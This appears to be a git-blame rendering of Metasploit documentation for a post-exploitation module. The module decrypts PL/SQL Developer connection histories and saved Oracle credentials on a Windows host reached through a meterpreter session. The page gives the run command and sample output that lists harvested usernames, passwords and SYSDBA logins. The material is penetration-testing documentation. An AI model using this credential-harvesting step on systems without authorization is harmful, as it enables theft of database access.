2023-10-26 19:38:52 +08:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2023-11-08 01:15:22 +08:00
|
|
|
This module can decrypt the histories and connection credentials of PL/SQL Developer,
|
|
|
|
|
and passwords are available if the user chooses to remember.
|
|
|
|
|
|
2023-10-27 02:02:00 +08:00
|
|
|
Analysis of encryption algorithm [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
|
|
|
|
|
You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).
|
2023-10-26 19:38:52 +08:00
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
2023-11-09 05:08:27 +08:00
|
|
|
1. Download and install PL/SQL Developer.
|
2023-10-26 19:38:52 +08:00
|
|
|
2. (Optional) Change the PL/SQL Developer preference to save the passwords.
|
2023-11-08 01:15:22 +08:00
|
|
|
3. Use PL/SQL Developer to log in to oracle databases. Or add a connection in PL/SQL Developer manually.
|
2023-10-26 19:38:52 +08:00
|
|
|
4. Get a `meterpreter` session on a Windows host.
|
2023-11-08 01:15:22 +08:00
|
|
|
5. Do: `run post/windows/gather/credentials/plsql_developer`
|
|
|
|
|
6. The username, password, SID of connections will be printed.
|
2023-10-26 19:38:52 +08:00
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
**PLSQL_PATH**
|
|
|
|
|
|
|
|
|
|
- Specify the path of PL/SQL Developer
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
meterpreter > run windows/gather/credentials/plsql_developer
|
|
|
|
|
|
2023-11-08 01:15:22 +08:00
|
|
|
[*] Gather PL/SQL Developer Histories and Connections on WIN-XXXXXXXXXXX
|
2023-10-26 19:38:52 +08:00
|
|
|
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
2023-11-08 01:15:22 +08:00
|
|
|
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
|
2023-11-09 05:08:27 +08:00
|
|
|
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
|
2023-11-08 01:15:22 +08:00
|
|
|
PL/SQL Developer Histories and Credentials
|
|
|
|
|
==========================================
|
|
|
|
|
|
2023-11-09 13:58:14 +08:00
|
|
|
DisplayName Username Database ConnectAs Password FilePath
|
|
|
|
|
----------- -------- -------- --------- -------- --------
|
|
|
|
|
[Connections]/Imported Fixed Users/Test sys ORCL SYSDBA pass C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
|
|
|
|
|
[Connections]/Imported History/Test sys ORCL SYSDBA oracle C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
|
|
|
|
|
[LogonHistory] test2 ORCL Normal password2 C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
|
|
|
|
[LogonHistory] test1 ORCL Normal C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
|
|
|
|
[LogonHistory] sys ORCL SYSDBA oracle C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
|
|
|
|
[LogonHistory] user server Normal password C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
2023-11-08 01:15:22 +08:00
|
|
|
|
2023-11-09 05:08:27 +08:00
|
|
|
[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231109050433_default_127.0.0.1_host.plsql_devel_357810.txt
|
2023-10-26 19:38:52 +08:00
|
|
|
meterpreter >
|
|
|
|
|
```
|
